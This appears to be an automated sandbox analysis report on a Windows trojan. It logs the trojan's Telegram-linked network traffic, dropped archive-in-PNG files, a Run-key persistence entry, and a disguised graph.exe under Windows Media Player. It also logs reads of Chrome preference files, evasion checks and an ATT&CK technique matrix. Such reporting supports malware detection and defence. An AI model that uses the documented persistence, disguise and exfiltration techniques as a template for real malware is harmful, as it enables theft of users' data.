Source: file.exe, 00000000.00000003.2174782172.000001E42764C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172846719.000001E427647000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172974912.000001E42764B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreF
Source: file.exe, 00000000.00000003.2173656848.000001E42763B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore_
Source: file.exe, 00000002.00000003.2183071483.0000020705494000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285253534.000002070549B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: file.exe, 00000000.00000003.2172846719.000001E427647000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172974912.000001E42764B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra6
Source: file.exe, 00000002.00000003.2183250126.000002070549B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183222413.0000020705493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285253534.000002070549B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierraC&b
Source: file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox2CppkN
Source: file.exe, 00000000.00000003.2174782172.000001E42764C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172846719.000001E427647000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172974912.000001E42764B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxJ
Source: file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxK
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49720 version: TLS 1.2

System Summary

Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\output[1].png, type: DROPPED Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
Source: C:\Users\user\Desktop\file.exe File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000000.2149997918.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamewusvc4 vs file.exe
Source: file.exe, 00000002.00000002.2327010985.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamewusvc4 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamewusvc4 vs file.exe
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\output[1].png, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: classification engine Classification label: mal80.troj.spyw.winEXE@8/9@4/4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF72C9B5D60 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,SleepEx,_invalid_parameter_noinfo_noreturn,0_2_00007FF72C9B5D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF72C9C5EC0 GetModuleFileNameA,GetLastError,GetLastError,CoInitializeEx,CoCreateInstance,CoUninitialize,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,SysAllocString,SysFreeString,CoUninitialize,SysAllocString,SysFreeString,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,SysFreeString,CoUninitialize,SysAllocString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF72C9C5EC0
Source: C:\Users\user\Desktop\file.exe File created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\output[1].png
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe ReversingLabs: Detection: 63%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknown Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknown Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"Jump to behavior
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: samcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: taskschd.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: xmllite.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: samlib.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Section loaded: apphelp.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\file.exe | Directory created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\Desktop\file.exe | Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\Desktop\file.exe | Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: C:\Users\user\Desktop\file.exe | Directory created: C:\Program Files\Windows Media Player\graph
Source: C:\Users\user\Desktop\file.exe | Directory created: C:\Program Files\Windows Media Player\graph\graph.exe
Source: file.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: file.exe, 00000000.00000003.2261377843.000001E429283000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000000.2261561392.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000002.4001980452.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.2285577697.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.4001973279.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000006.00000002.4001926398.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000006.00000000.2357174678.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.4001924174.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.2437643141.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: file.exe
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: file.exe
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: file.exe, 00000000.00000003.2261377843.000001E429283000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000000.2261561392.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000002.4001980452.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.2285577697.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.4001973279.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000006.00000002.4001926398.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000006.00000000.2357174678.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.4001924174.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.2437643141.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
Source: C:\Users\user\Desktop\file.exe | File created: C:\Program Files\Windows Media Player\graph\graph.exe
Source: C:\Users\user\Desktop\file.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\Desktop\file.exe | Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\Desktop\file.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Windows Media Player\graph\graph.exe | API coverage: 3.1 %
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5844 | Thread sleep count: 166 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5844 | Thread sleep time: -166000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5688 | Thread sleep count: 163 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5688 | Thread sleep time: -163000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5696 | Thread sleep count: 157 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5696 | Thread sleep time: -157000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 612 | Thread sleep count: 150 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 612 | Thread sleep time: -150000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72C9B9B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF72C9B9B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72C9EE3CC FindClose,FindFirstFileExW,GetLastError,0_2_00007FF72C9EE3CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72C9EE440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,0_2_00007FF72C9EE440
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72CA1070C FindFirstFileExW,0_2_00007FF72CA1070C
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: 4_2_00007FF67D6FCD7C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,4_2_00007FF67D6FCD7C
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: 4_2_00007FF67D70FA54 FindFirstFileExW,4_2_00007FF67D70FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: 4_2_00007FF67D6FCD08 FindClose,FindFirstFileExW,GetLastError,4_2_00007FF67D6FCD08
Source: file.exe, 00000000.00000003.2261006797.000001E42769C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2302541318.000001E42769A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2261006797.000001E427663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2302541318.000001E427663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.00000207054E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285253534.00000207054E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2302541318.000001E4275F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72C9FCA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF72C9FCA44
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72C9F2348 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF72C9F2348
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72CA11EF8 GetProcessHeap,0_2_00007FF72CA11EF8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72C9F36EC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF72C9F36EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72C9F2798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF72C9F2798
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72C9F38CC SetUnhandledExceptionFilter,0_2_00007FF72C9F38CC
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: 4_2_00007FF67D70364C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF67D70364C
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: 4_2_00007FF67D6FE6D0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF67D6FE6D0
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: 4_2_00007FF67D6FE8B0 SetUnhandledExceptionFilter,4_2_00007FF67D6FE8B0
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: 4_2_00007FF67D6FE3EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF67D6FE3EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72CA18D10 cpuid 0_2_00007FF72CA18D10
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,0_2_00007FF72CA08D4C
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF72C9EDF9C
Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW,0_2_00007FF72CA14060
Source: C:\Users\user\Desktop\file.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF72CA13D04
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF72CA14568
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,0_2_00007FF72CA14618
Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF72CA1474C
Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW,0_2_00007FF72CA08874
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF72CA141C8
Source: C:\Users\user\Desktop\file.exe | Code function: EnumSystemLocalesW,0_2_00007FF72CA14130
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,0_2_00007FF72CA14410
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: GetLocaleInfoW,4_2_00007FF67D713650
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: GetLocaleInfoW,4_2_00007FF67D70A83C
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: GetLocaleInfoW,4_2_00007FF67D713858
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: GetLocaleInfoEx,FormatMessageA,4_2_00007FF67D6FAF50
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,4_2_00007FF67D712F44
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00007FF67D7137A8
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: EnumSystemLocalesW,4_2_00007FF67D7132A0
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF67D71398C
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: EnumSystemLocalesW,4_2_00007FF67D70A4A8
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF67D713408
Source: C:\Program Files\Windows Media Player\graph\graph.exe | Code function: EnumSystemLocalesW,4_2_00007FF67D713370
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72C9F1DC4 GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_00007FF72C9F1DC4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF72CA0D2C8 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF72CA0D2C8

Stealing of Sensitive Information

Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Scheduled Task/Job | 1 Process Injection | 1 Obfuscated Files or Information | LSASS Memory | 1 System Network Connections Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 DLL Side-Loading | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
